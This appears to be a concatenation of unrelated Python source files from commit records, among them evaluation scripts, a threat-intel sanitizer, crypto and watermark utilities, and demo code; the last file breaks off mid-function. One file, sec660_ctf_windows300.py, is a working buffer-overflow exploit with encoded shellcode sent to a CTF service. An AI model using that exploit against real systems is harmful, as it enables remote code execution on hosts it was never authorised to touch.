from functools import reduce
class LargestProduct:
def __init__(self, num, num_consecutive_digits):
self.num = num
self.num_consecutive_digits = num_consecutive_digits
def largest_product(self):
return max(map(LargestProduct.product, LargestProduct.slices(LargestProduct.digits(self.num), self.num_consecutive_digits)))
@staticmethod
def slices(array, slice_length):
return [array[i:i + slice_length] for i in range(len(array) - slice_length)]
@staticmethod
def digits(num):
return [int(x) for x in str(num)]
@staticmethod
def product(array):
return reduce((lambda x, y: x * y), array)
t = int(input().strip())
for a0 in range(t):
_, num_consecutive_digits = map(int, input().strip().split(' '))
num = input().strip()
lp = LargestProduct(num, num_consecutive_digits)
print (lp.largest_product())
| Python | 0.999999 | |
8c14684667b48921987f833f41727d036a3fe9f7 | Add SICK evaluation script in python | python/evaluate.py | python/evaluate.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import argparse
import re
from collections import Counter
#################################
def parse_arguments():
parser = argparse.ArgumentParser(description="Evaluate predictions against gold labels.")
parser.add_argument(
'sys', metavar='FILE', help='File with problem ID, white space and label per line')
parser.add_argument(
'gld', metavar='FILE', help="File with gold label. The format might vary")
# meta parameters
parser.add_argument(
'-v', '--verbose', dest='v', default=0, type=int, metavar='N', help='verbosity level of reporting')
args = parser.parse_args()
return args
#################################
def read_id_labels(filepath, pattern="(\d+)\s+(NEUTRAL|CONTRADICTION|ENTAILMENT)"):
'''Read a list of (ID, label) pairs from the file'''
id_labels = dict()
with open(filepath) as f:
for line in f:
m = re.search(pattern, line)
if m: id_labels[m.group(1)] = m.group(2)
return id_labels
#################################
def draw_conf_matrix(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Draw a confusion matrix for labels from two sources'''
print(f"{63*'-'}\n{'':15} {labs[0]:>15} {labs[1]:>15} {labs[2]:>15}\n{63*'-'}")
for gld in labs:
print(f"{gld:>15}", end=' ')
for sys in labs:
print(f"{counter[(sys, gld)]:>15}", end=' ')
print()
print(63*'-')
#################################
def calc_measures(counter, labs=['ENTAILMENT', 'CONTRADICTION', 'NEUTRAL']):
'''Calculate various measures'''
m = dict()
diag = sum([ counter[(l,l)] for l in labs ])
total = sum(counter.values())
m['accuracy'] = 100.0*diag / total
# precision and recall as C & E positives
diagEC = sum([ counter[(l,l)] for l in labs[:2] ])
sys_neut = sum([ counter[(labs[2],l)] for l in labs ])
gld_neut = sum([ counter[(l,labs[2])] for l in labs ])
m['precision'] = 100.0*diagEC / (total - sys_neut)
m['recall'] = 100.0*diagEC / (total - gld_neut)
return m
#################################
if __name__ == '__main__':
args = parse_arguments()
sys_ans = read_id_labels(args.sys)
gld_ans = read_id_labels(args.gld, pattern="^(\d+)\s+.+(NEUTRAL|CONTRADICTION|ENTAILMENT)$")
assert len(sys_ans) == len(gld_ans),\
f"The sources contain different number of problems ({len(sys_ans)} vs {len(gld_ans)})"
lab_pairs = [ (sys_ans[k], gld_ans[k]) for k in sys_ans ]
counter = Counter(lab_pairs)
draw_conf_matrix(counter)
m = calc_measures(counter)
for name in sorted(m.keys()):
print(f"{name:<12}: {m[name]:4.2f}%")
| Python | 0 | |
dc4620b46cdca4084fe0b64e3f8e08025e511cea | fix sanitizer | intelmq/bots/experts/sanitizer/sanitizer.py | intelmq/bots/experts/sanitizer/sanitizer.py | from intelmq.lib.bot import Bot, sys
from intelmq.bots import utils
class SanitizerBot(Bot):
def process(self):
event = self.receive_message()
if event:
keys_pairs = [
(
"source_ip",
"source_domain_name",
"source_url",
"source_asn"
),
(
"destination_ip",
"destination_domain_name",
"destination_url",
"destination_asn"
)
]
for keys in keys_pairs:
ip = domain_name = url = None
for key in keys:
if "asn" in key:
continue
if not event.contains(key):
continue
value = event.value(key)
if len(value) <= 2: # ignore invalid values
continue
result = utils.is_ip(value)
if result:
ip = result
result = utils.is_domain_name(value)
if result:
domain_name = result
result = utils.is_url(value)
if result:
url = result
if not domain_name and url:
domain_name = utils.get_domain_name_from_url(url)
if not ip and domain_name:
ip = utils.get_ip_from_domain_name(domain_name)
if not ip and url:
ip = utils.get_ip_from_url(url)
for key in keys:
if "url" in key and url:
event.clear(key)
event.add(key, url)
if "domain_name" in key and domain_name:
event.clear(key)
event.add(key, domain_name)
if "ip" in key and ip:
event.clear(key)
event.add(key, ip)
if "asn" in key:
try:
int(event.value(key))
except ValueError:
event.clear(key)
self.send_message(event)
self.acknowledge_message()
if __name__ == "__main__":
bot = SanitizerBot(sys.argv[1])
bot.start()
| from intelmq.lib.bot import Bot, sys
from intelmq.bots import utils
class SanitizerBot(Bot):
def process(self):
event = self.receive_message()
if event:
keys_pairs = [
(
"source_ip",
"source_domain_name",
"source_url"
),
(
"destination_ip",
"destination_domain_name",
"destination_url"
)
]
for keys in keys_pairs:
ip = domain_name = url = None
for key in keys:
if not event.contains(key):
continue
value = event.value(key)
if len(value) <= 2: # ignore invalid values
continue
result = utils.is_ip(value)
if result:
ip = result
result = utils.is_domain_name(value)
if result:
domain_name = result
result = utils.is_url(value)
if result:
url = result
if not domain_name and url:
domain_name = utils.get_domain_name_from_url(url)
if not ip and domain_name:
ip = utils.get_ip_from_domain_name(domain_name)
if not ip and url:
ip = utils.get_ip_from_url(url)
for key in keys:
event.clear(key)
if "url" in key and url:
event.add(key, url)
if "domain_name" in key and domain_name:
event.add(key, domain_name)
if "ip" in key and ip:
event.add(key, ip)
self.send_message(event)
self.acknowledge_message()
if __name__ == "__main__":
bot = SanitizerBot(sys.argv[1])
bot.start()
| Python | 0.000001 |
cd239be7ec84ccb000992841700effeb4bc6a508 | Add quickstart fabfile.py | streamparse/bootstrap/project/fabfile.py | streamparse/bootstrap/project/fabfile.py | """fab env:prod deploy:wordcount"""
import json
from fabric.api import run, put, env as _env
from fabric.decorators import task
@task
def env(e=None):
"""Activate a particular environment from the config.json file."""
with open('config.json', 'r') as fp:
config = json.load(fp)
_env.hosts = config['envs'][e]['hosts']
@task
def deploy(topology=None):
"""Deploy a topology to a remote host. Deploying a streamparse topology
accomplishes two things:
1. Create an uberjar which contains all code.
2. Push the topology virtualenv requirements to remote.
3. Update virtualenv on host server.
4. Submit topology (in uberjar) to remote Storm cluster."""
pass
| Python | 0.000001 | |
7f7fbb94796134301ee5289fa447e8632f59c912 | Create sec660_ctf_windows300.py | sec660_ctf_windows300.py | sec660_ctf_windows300.py | #!/usr/bin/python
import socket
import sys
import time
buf = ""
buf += "\xd9\xc5\xba\x43\xdc\xd1\x08\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\x15\xcf\x33"
buf += "\xfd\x65\x07\x31\xfe\x95\xd8\x56\x76\x70\xe9\x56\xec"
buf += "\xf1\x5a\x67\x66\x57\x57\x0c\x2a\x43\xec\x60\xe3\x64"
buf += "\x45\xce\xd5\x4b\x56\x63\x25\xca\xd4\x7e\x7a\x2c\xe4"
buf += "\xb0\x8f\x2d\x21\xac\x62\x7f\xfa\xba\xd1\x6f\x8f\xf7"
buf += "\xe9\x04\xc3\x16\x6a\xf9\x94\x19\x5b\xac\xaf\x43\x7b"
buf += "\x4f\x63\xf8\x32\x57\x60\xc5\x8d\xec\x52\xb1\x0f\x24"
buf += "\xab\x3a\xa3\x09\x03\xc9\xbd\x4e\xa4\x32\xc8\xa6\xd6"
buf += "\xcf\xcb\x7d\xa4\x0b\x59\x65\x0e\xdf\xf9\x41\xae\x0c"
buf += "\x9f\x02\xbc\xf9\xeb\x4c\xa1\xfc\x38\xe7\xdd\x75\xbf"
buf += "\x27\x54\xcd\xe4\xe3\x3c\x95\x85\xb2\x98\x78\xb9\xa4"
buf += "\x42\x24\x1f\xaf\x6f\x31\x12\xf2\xe7\xf6\x1f\x0c\xf8"
buf += "\x90\x28\x7f\xca\x3f\x83\x17\x66\xb7\x0d\xe0\x89\xe2"
buf += "\xea\x7e\x74\x0d\x0b\x57\xb3\x59\x5b\xcf\x12\xe2\x30"
buf += "\x0f\x9a\x37\xac\x07\x3d\xe8\xd3\xea\xfd\x58\x54\x44"
buf += "\x96\xb2\x5b\xbb\x86\xbc\xb1\xd4\x2f\x41\x3a\xcb\xf3"
buf += "\xcc\xdc\x81\x1b\x99\x77\x3d\xde\xfe\x4f\xda\x21\xd5"
buf += "\xe7\x4c\x69\x3f\x3f\x73\x6a\x15\x17\xe3\xe1\x7a\xa3"
buf += "\x12\xf6\x56\x83\x43\x61\x2c\x42\x26\x13\x31\x4f\xd0"
buf += "\xb0\xa0\x14\x20\xbe\xd8\x82\x77\x97\x2f\xdb\x1d\x05"
buf += "\x09\x75\x03\xd4\xcf\xbe\x87\x03\x2c\x40\x06\xc1\x08"
buf += "\x66\x18\x1f\x90\x22\x4c\xcf\xc7\xfc\x3a\xa9\xb1\x4e"
buf += "\x94\x63\x6d\x19\x70\xf5\x5d\x9a\x06\xfa\x8b\x6c\xe6"
buf += "\x4b\x62\x29\x19\x63\xe2\xbd\x62\x99\x92\x42\xb9\x19"
buf += "\xa2\x08\xe3\x08\x2b\xd5\x76\x09\x36\xe6\xad\x4e\x4f"
buf += "\x65\x47\x2f\xb4\x75\x22\x2a\xf0\x31\xdf\x46\x69\xd4"
buf += "\xdf\xf5\x8a\xfd"
buf1 = "B" * 10
buf2 = "\x90" * 100 + buf + "A" * (1932 - 100 - len(buf)) + "\xca\x12\x40\00"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((sys.argv[1], 1337))
s.send(buf1 + '\r\n')
print s.recv(1024)
#time.sleep(30)
raw_input('Press enter to continue')
s.send(buf2 + '\r\n')
print s.recv(1024)
s.close()
| Python | 0.000001 | |
348b10962f12e1c49ed5c4caf06a838b89b1e5af | Create plasma.py | plasma.py | plasma.py | import geometry
| Python | 0.000003 | |
602c999c9b5a786623135df1cbf27b529e140d6e | add watermark script | script/watermark.py | script/watermark.py | #!/usr/bin/env python
# -*- coding: utf8 -*-
import os
import random
from argparse import ArgumentParser
import cv2
import numpy
class InvisibleWaterMark:
def __init__(self):
self.seed = 1
def encode(self, image, watermark, result):
# img = cv2.imread(image)
# wm = cv2.imread(watermark)
# h, w = img.shape[0], img.shape[1]
# wm_h, wm_w = wm.shape[0], wm.shape[1]
# m, n = range(h/2), range(w)
# # 產生亂數
# random.seed(self.seed)
# random.shuffle(m)
# random.shuffle(n)
# rwm = numpy.zeros(img.shape)
# for i in range(h/2):
# for j in range(w):
# if m[i] < wm_h and n[j] < wm_w:
# try:
# rwm[i][j] = wm[i][j]
# rwm[h - i - 1][w - j - 1] = rwm[i][j]
# except:
# pass
# res = numpy.fft.fft2(img) + rwm * 5
# _img = numpy.fft.ifft2(res)
# img_wm = numpy.real(_img)
# cv2.imwrite(result, img_wm, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
img = cv2.imread(image)
img_f = numpy.fft.fft2(img)
height, width, channel = numpy.shape(img)
watermark = cv2.imread(watermark)
wm_height, wm_width = watermark.shape[0], watermark.shape[1]
x, y = range(height / 2), range(width)
random.seed(height + width)
random.shuffle(x)
random.shuffle(y)
tmp = numpy.zeros(img.shape)
for i in range(height / 2):
for j in range(width):
if x[i] < wm_height and y[j] < wm_width:
tmp[i][j] = watermark[x[i]][y[j]]
tmp[height - 1 - i][width - 1 - j] = tmp[i][j]
res_f = img_f + 2 * tmp
res = numpy.fft.ifft2(res_f)
res = numpy.real(res)
cv2.imwrite(result, res, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
def decode(self, image, encode_image, result):
# img = cv2.imread(image)
# img_wm = cv2.imread(encode_image)
# h, w = img.shape[0], img.shape[1]
# img_f = numpy.fft.fft2(img)
# img_wm_f = numpy.fft.fft2(img_wm)
# watermark = numpy.real((img_f - img_wm_f) / 5)
# wm = numpy.zeros(watermark.shape)
# # 產生亂數
# m, n = range(h/2), range(w)
# random.seed(self.seed)
# random.shuffle(m)
# random.shuffle(n)
# for i in range(h / 2):
# for j in range(w):
# wm[m[i]][n[j]] = watermark[i][j]
# cv2.imwrite(result, wm, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
ori = cv2.imread(image)
img = cv2.imread(encode_image)
ori_f = numpy.fft.fft2(ori)
img_f = numpy.fft.fft2(img)
height, width = ori.shape[0], ori.shape[1]
watermark = (ori_f - img_f) / 2
watermark = numpy.real(watermark)
res = numpy.zeros(watermark.shape)
random.seed(height + width)
x = range(height / 2)
y = range(width)
random.shuffle(x)
random.shuffle(y)
for i in range(height / 2):
for j in range(width):
res[x[i]][y[j]] = watermark[i][j]
cv2.imwrite(result, res, [int(cv2.IMWRITE_JPEG_QUALITY), 100])
def build_parser():
parser = ArgumentParser()
parser.add_argument('--ori', dest='ori', required=True)
parser.add_argument('--im', dest='im', required=True)
parser.add_argument('--res', dest='res', required=True)
parser.add_argument('--cmd', dest='cmd', required=True)
return parser
def main():
parser = build_parser()
options = parser.parse_args()
ori = options.ori
im = options.im
res = options.res
cmd = options.cmd
if not os.path.isfile(ori):
parser.error("image %s does not exist." % ori)
if not os.path.isfile(im):
parser.error("image %s does not exist." % im)
watermark = InvisibleWaterMark()
if cmd == 'encode':
watermark.encode(ori, im, res)
elif cmd == 'decode':
watermark.decode(ori, im, res)
else:
parser.error("cmd %s does not exist." % im)
if __name__ == "__main__":
main()
| Python | 0.000001 | |
bd05625c2e0a164f0b720c8c13fb06540d4fcdb9 | Create ica_demo.py (#496) | scripts/ica_demo.py | scripts/ica_demo.py | # Blind source separation using FastICA and PCA
# Author : Aleyna Kara
# This file is based on https://github.com/probml/pmtk3/blob/master/demos/icaDemo.m
from sklearn.decomposition import PCA, FastICA
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
def plot_signals(signals, suptitle, file_name):
plt.figure(figsize=(8, 4))
for i, signal in enumerate(signals, 1):
plt.subplot(n_signals, 1, i)
plt.plot(signal)
plt.xlim([0, N])
plt.tight_layout()
plt.suptitle(suptitle)
plt.subplots_adjust(top=0.85)
pml.savefig(f'{file_name}.pdf')
plt.show()
# https://github.com/davidkun/FastICA/blob/master/demosig.m
def generate_signals():
v = np.arange(0, 500)
signals = np.zeros((n_signals, N))
signals[0, :] = np.sin(v/2) # sinusoid
signals[1, :] = ((v % 23 - 11) / 9)**5
signals[2, :] = ((v % 27 - 13)/ 9) # sawtooth
rand = np.random.rand(1, N)
signals[3, :] = np.where(rand < 0.5, rand * 2 -1, -1) * np.log(np.random.rand(1, N)) #impulsive noise
signals /= signals.std(axis=1).reshape((-1,1))
signals -= signals.mean(axis=1).reshape((-1,1))
A = np.random.rand(n_signals, n_signals) # mixing matrix
return signals, A @ signals
np.random.seed(0)
n_signals, N = 4, 500
signals, mixed_signals = generate_signals()
plot_signals(signals, 'Truth', 'ica-truth')
plot_signals(mixed_signals, 'Observed Signals', 'ica-obs')
pca = PCA(whiten=True, n_components=4)
signals_pca = pca.fit(mixed_signals.T).transform(mixed_signals.T)
ica = FastICA(algorithm='deflation', n_components=4)
signals_ica = ica.fit_transform(mixed_signals.T)
plot_signals(signals_pca.T, 'PCA estimate','ica-pca')
plot_signals(signals_ica.T, 'ICA estimate', 'ica-ica') | Python | 0 | |
a8add82f2f9092d07f9ef40420c4b303700c912d | add a 'uniq' function | lib/uniq.py | lib/uniq.py | # from http://www.peterbe.com/plog/uniqifiers-benchmark
def identity(x):
return x
def uniq(seq, idfun=identity):
# order preserving
seen = {}
result = []
for item in seq:
marker = idfun(item)
if marker in seen:
continue
seen[marker] = True
result.append(item)
return result
| Python | 0.999997 | |
c57c672aae98fb5b280f70b68ac27fc2d94a243f | Add test class to cover the RandomForestClassifier in Go | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | tests/estimator/classifier/RandomForestClassifier/RandomForestClassifierGoTest.py | # -*- coding: utf-8 -*-
from unittest import TestCase
from sklearn.ensemble import RandomForestClassifier
from tests.estimator.classifier.Classifier import Classifier
from tests.language.Go import Go
class RandomForestClassifierGoTest(Go, Classifier, TestCase):
def setUp(self):
super(RandomForestClassifierGoTest, self).setUp()
self.estimator = RandomForestClassifier(n_estimators=100,
random_state=0)
def tearDown(self):
super(RandomForestClassifierGoTest, self).tearDown()
| Python | 0 | |
e045a7bd1c3d791de40412bafa62702bee59132e | Add Python solution for day 15. | day15/solution.py | day15/solution.py |
data = open("data", "r").read()
ingredients = []
for line in data.split("\n"):
name = line.split(": ")[0]
properties = line.split(": ")[1].split(", ")
props = { 'value': 0 }
for prop in properties:
props[prop.split(" ")[0]] = int(prop.split(" ")[1])
ingredients.append(props)
def getPropertyScore(property, ingredients):
value = 0
for ingredient in ingredients:
value += ingredient[property] * ingredient['value']
if value <= 0:
return 0
else:
return value
def calculateScore(ingredients):
score = getPropertyScore("capacity", ingredients)
score *= getPropertyScore("durability", ingredients)
score *= getPropertyScore("flavor", ingredients)
score *= getPropertyScore("texture", ingredients)
calories = getPropertyScore("calories", ingredients)
return score, calories
def addValue(ingredient, value):
ingredient['value'] = value
return ingredient
maxScore = -100
optionsTried = 0
for i in xrange(1, 100):
for j in xrange(1, 100 - i):
for k in xrange(1, 100 - i - j):
h = 100 - i - j - k
scoreInput = [
addValue(ingredients[0], i),
addValue(ingredients[1], j),
addValue(ingredients[2], k),
addValue(ingredients[3], h)
]
score, calories = calculateScore(scoreInput)
if calories == 500 and maxScore < score:
maxScore = score
optionsTried += 1
print "maxScore:", maxScore
print "optionsTried:", optionsTried
| Python | 0.000004 | |
df68e5aa8ab620f03c668ae886ed8a1beef3c697 | Add HKDF-SHA256 implementation. | hkdf-sha256.py | hkdf-sha256.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
import obfsproxy.transports.base as base
import math
class HKDF_SHA256( object ):
"""
Implements HKDF using SHA256: https://tools.ietf.org/html/rfc5869
This class only implements the `expand' but not the `extract' stage.
"""
def __init__( self, prk, info="", length=32 ):
self.HashLen = 32
if length > (self.HashLen * 255):
raise ValueError("The OKM's length cannot be larger than %d." % \
(self.HashLen * 255))
if len(prk) < self.HashLen:
raise ValueError("The PRK must be at least %d bytes in length." % \
self.HashLen)
self.N = math.ceil(float(length) / self.HashLen)
self.prk = prk
self.info = info
self.length = length
self.ctr = 1
self.T = ""
def expand( self ):
"""Expands, based on PRK, info and L, the given input material to the
output key material."""
tmp = ""
# Prevent the accidental re-use of output keying material.
if len(self.T) > 0:
raise base.PluggableTransportError("HKDF-SHA256 OKM must not " \
"be re-used by application.")
while self.length > len(self.T):
tmp = HMAC.new(self.prk, tmp + self.info + chr(self.ctr),
SHA256).digest()
self.T += tmp
self.ctr += 1
return self.T[:self.length]
| Python | 0 | |
7cf5f0a4e2b7c8e83f26ea3f9170c5ee0e7bbdbb | make it easier to compare/validate models | parserator/spotcheck.py | parserator/spotcheck.py | import pycrfsuite
def compareTaggers(model1, model2, string_list, module_name):
"""
Compare two models. Given a list of strings, prints out tokens & tags
whenever the two taggers parse a string differently. This is for spot-checking models
:param tagger1: a .crfsuite filename
:param tagger2: another .crfsuite filename
:param string_list: a list of strings to be checked
:param module_name: name of a parser module
"""
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
count_discrepancies = 0
for string in string_list:
tokens = module.tokenize(string)
if tokens:
features = module.tokens2features(tokens)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if tags1 != tags2:
count_discrepancies += 1
print '\n'
print "%s. %s" %(count_discrepancies, string)
print '-'*75
print_spaced('token', model1, model2)
print '-'*75
for token in zip(tokens, tags1, tags2):
print_spaced(token[0], token[1], token[2])
print "\n\n%s of %s strings were labeled differently"%(count_discrepancies, len(string_list))
def print_spaced(s1, s2, s3):
n = 25
print s1 + " "*(n-len(s1)) + s2 + " "*(n-len(s2)) + s3
def validateTaggers(model1, model2, labeled_string_list, module_name):
module = __import__(module_name)
tagger1 = pycrfsuite.Tagger()
tagger1.open(module_name+'/'+model1)
tagger2 = pycrfsuite.Tagger()
tagger2.open(module_name+'/'+model2)
wrong_count_1 = 0
wrong_count_2 = 0
wrong_count_both = 0
correct_count = 0
for labeled_string in labeled_string_list:
unlabeled_string, components = labeled_string
tokens = module.tokenize(unlabeled_string)
if tokens:
features = module.tokens2features(tokens)
_, tags_true = zip(*components)
tags_true = list(tags_true)
tags1 = tagger1.tag(features)
tags2 = tagger2.tag(features)
if (tags1 != tags_true) and (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_both += 1
elif (tags1 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "*%s: "%model1, tags1
print "%s: "%model2, tags2
wrong_count_1 += 1
elif (tags2 != tags_true):
print "\nSTRING: ", unlabeled_string
print "TRUE: ", tags_true
print "%s: "%model1, tags1
print "*%s: "%model2, tags2
wrong_count_2 += 1
else:
correct_count += 1
print "\n\nBOTH WRONG: ", wrong_count_both
print "%s WRONG: %s" %(model1, wrong_count_1)
print "%s WRONG: %s" %(model2, wrong_count_2)
print "BOTH CORRECT: ", correct_count
| Python | 0.000001 | |
d4adf3e0e177e80ce7bc825f1cb4e461e5551b2f | Add basic configuration support to oonib | oonib/config.py | oonib/config.py | from ooni.utils import Storage
import os
# XXX convert this to something that is a proper config file
main = Storage()
main.reporting_port = 8888
main.http_port = 8080
main.dns_udp_port = 5354
main.dns_tcp_port = 8002
main.daphn3_port = 9666
main.server_version = "Apache"
#main.ssl_private_key = /path/to/data/private.key
#main.ssl_certificate = /path/to/data/certificate.crt
#main.ssl_port = 8433
helpers = Storage()
helpers.http_return_request_port = 1234
daphn3 = Storage()
daphn3.yaml_file = "/path/to/data/oonib/daphn3.yaml"
daphn3.pcap_file = "/path/to/data/server.pcap"
| Python | 0 | |
2d76f1375ef1eb4d7ea1e8735d9ff55cfd12cea0 | introducing inline echo. print to stdout without the Fine newline | inline_echo.py | inline_echo.py | #!/usr/bin/env python
import sys
import os
def puaq(): # Print Usage And Quit
print("Usage: %s string_content" % os.path.basename(__file__))
sys.exit(1)
if __name__ == "__main__":
if len(sys.argv) < 2:
puaq()
sys.stdout.write(sys.argv[1])
| Python | 0.999926 | |
58f05fe7736ce387bb8086128bc9de32b8cd6a59 | Add simplify.py | livesync/indico_livesync/simplify.py | livesync/indico_livesync/simplify.py | # This file is part of Indico.
# Copyright (C) 2002 - 2014 European Organization for Nuclear Research (CERN).
#
# Indico is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# Indico is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Indico; if not, see <http://www.gnu.org/licenses/>.
from indico_livesync.models.queue import ChangeType
def process_records(records):
changes = {}
for record in records:
if record.type != ChangeType.deleted and record.object is None:
continue
if record.type == ChangeType.created:
changes[record.obj] = ChangeType.type
elif record.type == ChangeType.deleted:
changes[record.obj] = ChangeType.type
elif record.type in {ChangeType.moved, ChangeType.protection_changed}:
changes.update(_cascade_change(record))
elif record.type == ChangeType.title_changed:
pass
elif record.type == ChangeType.data_changed and not record.category_id:
changes[record.obj] = ChangeType.type
for obj, state in records.iteritems():
pass
def _cascade_change(record):
changes = {record.obj: record.type}
for subrecord in record.subrecords():
changes.update(_cascade_change(subrecord))
return changes
| Python | 0.000725 | |
6a65d102bfcd667c382704ea3430d76faaa1b3d1 | Add tests | tests/test_salut.py | tests/test_salut.py | import unittest
from mock import MagicMock
import socket
import gevent
import gevent.socket
from otis.common.salut import Announcer, Browser
class TestSalut(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_announce(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
announcer.stop()
def test_announce_registered_callback(self):
callback = MagicMock()
announcer = Announcer(
'Test', '_otis_test._tcp', 9999, callback.registered)
while not announcer.announced:
gevent.sleep(0.05)
callback.registered.assert_called_once_with(
'local.', '_otis_test._tcp.', 'Test')
announcer.stop()
def test_browse(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser(
'Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
announcer.stop()
def test_browse_resolved_callback(self):
ip = gevent.socket.gethostbyname(socket.gethostname())
port = 9999
announcer = Announcer('Test', '_otis_test._tcp', port)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
resolved_callback=callback.resolved)
while not browser.resolved:
gevent.sleep(0.05)
callback.resolved.assert_called_once_with(ip, port)
browser.stop()
announcer.stop()
def test_browse_unresolved_callback(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
callback = MagicMock()
browser = Browser(
'Test', '_otis_test._tcp',
unresolved_callback=callback.unresolved)
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
callback.unresolved.assert_called_once()
browser.stop()
def test_unresolve_resolve(self):
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
browser = Browser('Test', '_otis_test._tcp')
while not browser.resolved:
gevent.sleep(0.05)
announcer.stop()
while announcer.announced:
gevent.sleep(0.05)
announcer = None
while browser.resolved:
gevent.sleep(0.05)
announcer = Announcer('Test', '_otis_test._tcp', 9999)
while not announcer.announced:
gevent.sleep(0.05)
while not browser.resolved:
gevent.sleep(0.05)
browser.stop()
| Python | 0.000001 | |
f65a6c12dd615d235a306b130ebd63358429e8c6 | Create boss.py | boss.py | boss.py | # -*- coding: utf-8 -*-
import urllib
import urllib2
import re
from cookielib import CookieJar
reg = re.compile(r'href="\.\/in[^"\\]*(?:\\.[^"\\]*)*"')
stager = re.compile(r'>.+100.')
answers = {1: '/index.php?answer=42', 2: '/index.php?answer=bt'}
wrong = set()
cj = CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
response = opener.open("http://maze.qctf.ru/index.php")
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
chosen = answers[1]
response = opener.open("http://maze.qctf.ru"+answers[1])
prev_stage = 1
while True:
content = response.read()
stage = int(stager.findall(content)[0][1:-6])
if stage == prev_stage+1:
if stage > len(answers):
print content
print "Stage "+str(stage)
print "Success "+str(stage-1)+" with "+chosen
answers[stage-1] = chosen
else:
wrong.add(chosen)
if len(answers) < stage:
v = [x[7:-1] for x in reg.findall(content)]
for x in v:
if x not in wrong:
chosen = x
break
response = opener.open("http://maze.qctf.ru"+chosen)
else:
chosen = answers[stage]
response = opener.open("http://maze.qctf.ru"+answers[stage])
prev_stage = stage
| Python | 0.000002 | |
3014e7cd47b87eaaf4cf793227a0bdba0a961494 | Determine `@local` function context from DistArrayProxies. | distarray/odin.py | distarray/odin.py | """
ODIN: ODin Isn't Numpy
"""
from IPython.parallel import Client
from distarray.client import DistArrayContext, DistArrayProxy
from itertools import chain
# Set up a global DistArrayContext on import
_global_client = Client()
_global_view = _global_client[:]
_global_context = DistArrayContext(_global_view)
context = _global_context
def flatten(lst):
""" Given a list of lists, return a flattened list.
Only flattens one level. For example,
>>> flatten(zip(['a', 'b', 'c'], [1, 2, 3]))
['a', 1, 'b', 2, 'c', 3]
>>> flatten([[1, 2], [3, 4, 5], [[5], [6], [7]]])
[1, 2, 3, 4, 5, [5], [6], [7]]
"""
return list(chain.from_iterable(lst))
def all_equal(lst):
"""Return True if all elements in `lst` are equal.
Also returns True if list is empty.
"""
if len(lst) == 0 or len(lst) == 1:
return True # vacuously True
else:
return all([element == lst[0] for element in lst[1:]])
def key_and_push_args(subcontext, arglist):
""" For each arg in arglist, get or generate a key (UUID).
For DistArrayProxy objects, just get the existing key. For
everything else, generate a key and push the value to the engines
Parameters
----------
subcontext : DistArrayContext
arglist : List of objects to key and/or push
Returns
-------
arg_keys : list of keys
"""
arg_keys = []
for arg in arglist:
if isinstance(arg, DistArrayProxy):
# if a DistArrayProxy, use its existing key
arg_keys.append(arg.key)
is_same_context = (subcontext == arg.context)
err_msg_fmt = "DistArrayProxy context mismatch: {} {}"
assert is_same_context, err_msg_fmt.format(subcontext, arg.context)
else:
# if not a DistArrayProxy, key it and push it to engines
arg_keys.extend(subcontext._key_and_push(arg))
return arg_keys
def determine_context(args):
"""Determine the DistArrayContext for a function.
Parameters
----------
args : iterable
List of objects to inspect for context. Objects that aren't of
type DistArrayProxy are skipped.
Returns
-------
DistArrayContext
If all provided DistArrayProxy objects have the same context.
Raises
------
ValueError
Raised if all DistArrayProxy objects don't have the same context.
"""
contexts = [arg.context for arg in args if isinstance(arg, DistArrayProxy)]
if len(contexts) == 0:
return context # use the module-provided context
elif not all_equal(contexts):
errmsg = "All DistArrayProxy objects must be defined in the same context: {}"
raise ValueError(errmsg.format(contexts))
else:
return contexts[0]
def local(fn):
""" Decorator indicating a function is run locally on engines.
Parameters
----------
fn : function to wrap to run locally on engines
Returns
-------
fn : function wrapped to run locally on engines
"""
# we want @local functions to be able to call each other, so push
# their `__name__` as their key
func_key = fn.__name__
_global_context._push({func_key: fn})
result_key = _global_context._generate_key()
def inner(*args, **kwargs):
subcontext = determine_context(flatten((args, kwargs.values())))
# generate keys for each parameter
# push to engines if not a DistArrayProxy
arg_keys = key_and_push_args(subcontext, args)
kwarg_names = kwargs.keys()
kwarg_keys = key_and_push_args(subcontext, kwargs.values())
